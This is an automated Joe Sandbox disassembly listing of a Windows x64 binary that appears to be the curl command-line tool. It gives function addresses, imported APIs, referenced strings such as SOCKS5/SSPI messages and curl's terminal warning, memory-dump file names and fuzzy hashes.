Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D16BC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88networkCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D16C51

Part of subcall function 00007FF7F8D12C90: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CAA
Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CB2
Part of subcall function 00007FF7F8D12C90: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CC9
Part of subcall function 00007FF7F8D12C90: strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CD5
Part of subcall function 00007FF7F8D12C90: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CE7
Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D91
Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D9C
Part of subcall function 00007FF7F8D12C90: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DA5
Part of subcall function 00007FF7F8D12C90: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DB1

recv.WS2_32 ref: 00007FF7F8D16C81
WSAGetLastError.WS2_32 ref: 00007FF7F8D16C98

Strings

Recv failure: %s, xrefs: 00007FF7F8D16CBC

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast$_errno$__sys_nerrfreerecvstrerrorstrncpy
String ID: Recv failure: %s
API String ID: 3745912867-4276829032
Opcode ID: cf785ebd3ff7ac6113d79ace72327a67e34ac1fc09e82a8d285f2af87dddee72
Instruction ID: be353a147b6753c7a8b08e237bb83b6f51ae1562bb77dfab33291d05d9a8fbe6
Opcode Fuzzy Hash: cf785ebd3ff7ac6113d79ace72327a67e34ac1fc09e82a8d285f2af87dddee72
Instruction Fuzzy Hash: 15318B32A09B4582EB00AB66E944368E7A1FF58FE0F948531DF2D07BC4CF78E0659384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D02A80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

SearchPathA.KERNELBASE ref: 00007FF7F8D02AE0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02AF1
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D02B03

Strings

curl-ca-bundle.crt, xrefs: 00007FF7F8D02AC0

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: PathSearch_strdupfree
String ID: curl-ca-bundle.crt
API String ID: 3871617166-694051528
Opcode ID: 80257d106268b7156702b807795f7bfdef38116b574733f601bbedbebd137cdd
Instruction ID: d6b00b6a01f9ab75290fddd15f8e78e878e19ac71c08b68390a93e8426d61e84
Opcode Fuzzy Hash: 80257d106268b7156702b807795f7bfdef38116b574733f601bbedbebd137cdd
Instruction Fuzzy Hash: CA114932308B8582EB159B64F8853AAF3A0FB8D784F840139DB9C43794DF3CD1588B54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D164D4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,?,?,00007FF7F8D0FBC5), ref: 00007FF7F8D16526

Strings

InitSecurityInterfaceA, xrefs: 00007FF7F8D1651C
secur32.dll, xrefs: 00007FF7F8D164FD
security.dll, xrefs: 00007FF7F8D164F2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: AddressProc
String ID: InitSecurityInterfaceA$secur32.dll$security.dll
API String ID: 190572456-3788156360
Opcode ID: 7a845b0dfd0f9790d6f35a26b160d084eb3f47bb28ba0316c029875815e7de1b
Instruction ID: 14d758e92c82ce4a47d60e21731fc575d3ab2643f35891e9a96262cd5030ccc2
Opcode Fuzzy Hash: 7a845b0dfd0f9790d6f35a26b160d084eb3f47bb28ba0316c029875815e7de1b
Instruction Fuzzy Hash: 790116A0A0AA4690FF15BB34B814275E391AF1C724FC80139C82D462D5EF3CA55DE6B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0FC9B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96sleepnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D23BB8: GetTickCount64.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,00007FF7F8D16245), ref: 00007FF7F8D23BC1

WSASetLastError.WS2_32 ref: 00007FF7F8D0FD31
Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF7F8D0FD39

Strings

xX, xrefs: 00007FF7F8D0FD4B

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: Count64ErrorLastSleepTick
String ID: xX
API String ID: 1418292552-1718075044
Opcode ID: 47cf11ce024fa1af2c8d60a81bf607da254bceded1632ad1003256207bf5c478
Instruction ID: 2c413bad8acba2b75af9b4067b61264881e591758ae9e5d26049353d9fc99404
Opcode Fuzzy Hash: 47cf11ce024fa1af2c8d60a81bf607da254bceded1632ad1003256207bf5c478
Instruction Fuzzy Hash: D331EA22E0C60687FB55EB69D0502BCE261EF49350FA40135DE3E566C9DF3CE849D3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D01CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D01BD0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01C0A
Part of subcall function 00007FF7F8D01BD0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01C18
Part of subcall function 00007FF7F8D01BD0: strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D01C23

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01D58
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D01D91

Strings

Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file., xrefs: 00007FF7F8D01D33

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: fclosefflushfopenfwritestrerror
String ID: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file.
API String ID: 4220792569-3734715646
Opcode ID: 39f5190e9b3c3a537bbde24749fb3a218a5e4388b8167e9e8207b6ef2417985a
Instruction ID: 5babce49df948b2e02631fc75bf4fa74ba5f29e89411852a2b1ee629c4af79f2
Opcode Fuzzy Hash: 39f5190e9b3c3a537bbde24749fb3a218a5e4388b8167e9e8207b6ef2417985a
Instruction Fuzzy Hash: 3831C411A0DA9546EF11EB22A400369E7A4FF5CFC4F884031DE6C0B799DF38E049A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D178B4 Relevance: 4.5, APIs: 3, Instructions: 37networkCOMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 00007FF7F8D178D5
getsockopt.WS2_32 ref: 00007FF7F8D178F8
WSAGetLastError.WS2_32 ref: 00007FF7F8D17902

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLastSleepgetsockopt
String ID:
API String ID: 3033474312-0
Opcode ID: 309a4c7660c9b131638026dff342b7747f44afaed63c76043abdc281d7bcf4d8
Instruction ID: c1546b90325c8924f6c48988725a089e15fc03e8390df54b57dba11b6ba90ed1
Opcode Fuzzy Hash: 309a4c7660c9b131638026dff342b7747f44afaed63c76043abdc281d7bcf4d8
Instruction Fuzzy Hash: 5E01D43260C94283F710AB20E44423AE3A0EF4C7A4F684030DAAD43AE8DF3DD45CDB54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1C3A4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D1C43C

Strings

Closing connection %ld, xrefs: 00007FF7F8D1C4C2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _time64
String ID: Closing connection %ld
API String ID: 1670930206-2599090834
Opcode ID: 5114cfb86861e21925603e0c8123021072bcdb675a0fd7059cf460fb5df34bc6
Instruction ID: 60661b4a6b162081100a9229b595eb134ca613f79b8f17b17c80c0501f7ce322
Opcode Fuzzy Hash: 5114cfb86861e21925603e0c8123021072bcdb675a0fd7059cf460fb5df34bc6
Instruction Fuzzy Hash: FB517E62A0CA8281FB54EB35D0543B9E361EF48BE4F984031DA2D076D5CF2CE459D7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D20E8C Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20EFC

Strings

User-Agent: %s, xrefs: 00007FF7F8D20F06

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID: User-Agent: %s
API String ID: 1294909896-43864714
Opcode ID: e1989e59a761badc1575e18e96f193f661b9bc852c2d6fad09cf12f4abae1ba9
Instruction ID: 6d1d00d330c64ecca90369fcc67d242ea23695dd3a9b6955442d056b5518c3c2
Opcode Fuzzy Hash: e1989e59a761badc1575e18e96f193f661b9bc852c2d6fad09cf12f4abae1ba9
Instruction Fuzzy Hash: 51318F22A08AC181EB58EB24D5403BAE750EF59780F944130DBB9076D2CF7CE5A9D794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0FB08 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FF7F8D0FBA5
WSACleanup.WS2_32 ref: 00007FF7F8D0FBCB

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: CleanupStartup
String ID:
API String ID: 915672949-0
Opcode ID: 0bf2d28154097ae3a4a02d73aa9df8a4ce6cd191b29eb8c49c53fac61c2a0ab7
Instruction ID: 0c9f5f0ccd98e2753c90c73073b0306d21c7efd1dbc62e1e24614f6b4ce3032f
Opcode Fuzzy Hash: 0bf2d28154097ae3a4a02d73aa9df8a4ce6cd191b29eb8c49c53fac61c2a0ab7
Instruction Fuzzy Hash: D3311820E0DA4785F760B724B895379E3A4AF1C350FD40035D87D822E6EE2CA44DABF9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D101D0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FF7F8D101EB
ExpandEnvironmentStringsA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7F8D1020A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: EnvironmentExpandStringsgetenv
String ID:
API String ID: 4247756900-0
Opcode ID: 8eaebc280501399d5d48418efa029988173f73c31852bf2ee3c03732f1254eae
Instruction ID: edfed837471a0e6c492de9ffb252e97b31f0551f5cfbc3c3d7562746123251da
Opcode Fuzzy Hash: 8eaebc280501399d5d48418efa029988173f73c31852bf2ee3c03732f1254eae
Instruction Fuzzy Hash: DAF04461A1DA8681FF21AB62F4A4365E390BF5C744FC80134DA9D4B794DE3CD14CDB94

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D24758 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FF7F8D24770
closesocket.WS2_32 ref: 00007FF7F8D24793

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: closesocketsocket
String ID:
API String ID: 2760038618-0
Opcode ID: a8e31ec4c6812d45385db6aecce42880c007cf63c768b4c654c65886e565fac6
Instruction ID: da213ca6940c0a8a9c23fee14a0a50739095db9366595061058b07ab8794088d
Opcode Fuzzy Hash: a8e31ec4c6812d45385db6aecce42880c007cf63c768b4c654c65886e565fac6
Instruction Fuzzy Hash: 86F0F830A0D5168AE740AB24E840A24F291BF59730F904730E43E822E0DB2C644CABE8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D14FDE Relevance: 2.7, APIs: 2, Instructions: 159COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D15197
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D151EB

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 70b9ead84d4ecb747685cd7c24f3ca89e7f85b9d018000f0ebea4e8804b4b7f5
Instruction ID: c61f832c4f4960ad7100d1344492f2eadd651107caa0d950a5dd6c52c0dc14c7
Opcode Fuzzy Hash: 70b9ead84d4ecb747685cd7c24f3ca89e7f85b9d018000f0ebea4e8804b4b7f5
Instruction Fuzzy Hash: 12619122A08A8681FB55EB7694407B9E3A0BF8DBA8F844135DE7E177D1DE2DD0089394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D13604 Relevance: 2.6, APIs: 2, Instructions: 105COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D13632

Part of subcall function 00007FF7F8D290F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D29150

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D137CA

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: callocfreemalloc
String ID:
API String ID: 4086611775-0
Opcode ID: 117018191ef2ce2d22307311a6c13794b0e4a6b55e4dcb7a3991b81abc3f5fa5
Instruction ID: d4901685b3c2beab10959a959606f65bce632628b8faf5785b066f1e7d5e7924
Opcode Fuzzy Hash: 117018191ef2ce2d22307311a6c13794b0e4a6b55e4dcb7a3991b81abc3f5fa5
Instruction Fuzzy Hash: 96514931608B42A6FB18EF21E9506A9F3A4FF48754FC40135DA6D43A91EF3CE129D398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D187D4 Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FF7F8D18876

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: socket
String ID:
API String ID: 98920635-0
Opcode ID: 7d5f5f8771239477de206143faa03e9e2d6f8fe07989bb391a30102118ef228f
Instruction ID: 954ba2846d312585b9b5ebb4af7055c779aaa8233b0583e757b0b158af770697
Opcode Fuzzy Hash: 7d5f5f8771239477de206143faa03e9e2d6f8fe07989bb391a30102118ef228f
Instruction Fuzzy Hash: 0D215CB3B05A80CAE750DF25E444B69B3A1FB88BA4F488235DE6987394DF38D845CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1875C Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FF7F8D1879D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 39586083f6ca1d1da527e7123ee2ba1e90cacf6a77714cfa57fd025c5b48c215
Instruction ID: 1b629cbf9823dfb76dd07de365c322f7e1dbfcea1bf5eeb292721293545bf375
Opcode Fuzzy Hash: 39586083f6ca1d1da527e7123ee2ba1e90cacf6a77714cfa57fd025c5b48c215
Instruction Fuzzy Hash: 3DF06D15B0EE8281FB54FB75A40407DE3A1EF4CBA0F884431EA2D47B95DE2CD49AD758

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF7F8D435DC Relevance: 93.6, APIs: 20, Strings: 33, Instructions: 866networkstringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D43651
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D436AF
__swprintf_l.LIBCMT ref: 00007FF7F8D436E7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D437CF
htons.WS2_32 ref: 00007FF7F8D438BA
htons.WS2_32 ref: 00007FF7F8D439E8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D43A0B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D43A79
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D43A9F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D43AC4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D43B37
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D43BCA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D43D75
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D43D9B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D43DEA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D43EE6
htons.WS2_32 ref: 00007FF7F8D44001
htons.WS2_32 ref: 00007FF7F8D44146
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D44167

Strings

Failed to receive SSPI authentication token., xrefs: 00007FF7F8D43B09
AcquireCredentialsHandle, xrefs: 00007FF7F8D43798
InitializeSecurityContext, xrefs: 00007FF7F8D43889
Failed to send SSPI encryption type., xrefs: 00007FF7F8D44076, 00007FF7F8D443BF
DecryptMessage, xrefs: 00007FF7F8D441F2
Failed to acquire credentials., xrefs: 00007FF7F8D437AD
Failed to determine user name., xrefs: 00007FF7F8D43C5B
out GSS-API data, xrefs: 00007FF7F8D4436B
QueryCredentialAttributes, xrefs: 00007FF7F8D43C0F
GSS-API confidentiality, xrefs: 00007FF7F8D4437E
Failed to send SSPI authentication token., xrefs: 00007FF7F8D43A57
QueryContextAttributes, xrefs: 00007FF7F8D43D19
Failed to receive SSPI authentication response., xrefs: 00007FF7F8D43BA6
Invalid SSPI encryption response length (%lu)., xrefs: 00007FF7F8D44261, 00007FF7F8D4430E
Failed to receive SSPI encryption type., xrefs: 00007FF7F8D4439F
Failed to send SSPI authentication request., xrefs: 00007FF7F8D43AFD
SOCKS5 access with%s protection granted., xrefs: 00007FF7F8D44389
integrity, xrefs: 00007FF7F8D43CBA
confidentiality, xrefs: 00007FF7F8D43CC1
GSS-API integrity, xrefs: 00007FF7F8D44377
rcmd, xrefs: 00007FF7F8D43609
SOCKS5 server authencticated user %s with GSS-API., xrefs: 00007FF7F8D43C6B
Failed to initialise security context., xrefs: 00007FF7F8D4444F
Failed to query security context attributes., xrefs: 00007FF7F8D43D48
Invalid SSPI encryption response type (%u %u)., xrefs: 00007FF7F8D44138
Failed to receive SSPI encryption response., xrefs: 00007FF7F8D443B3
%s/%s, xrefs: 00007FF7F8D436CE
SOCKS5 server supports GSS-API %s data protection., xrefs: 00007FF7F8D43CCC
EncryptMessage, xrefs: 00007FF7F8D43E54
Failed to send SSPI encryption request., xrefs: 00007FF7F8D443D8
Kerberos, xrefs: 00007FF7F8D43772
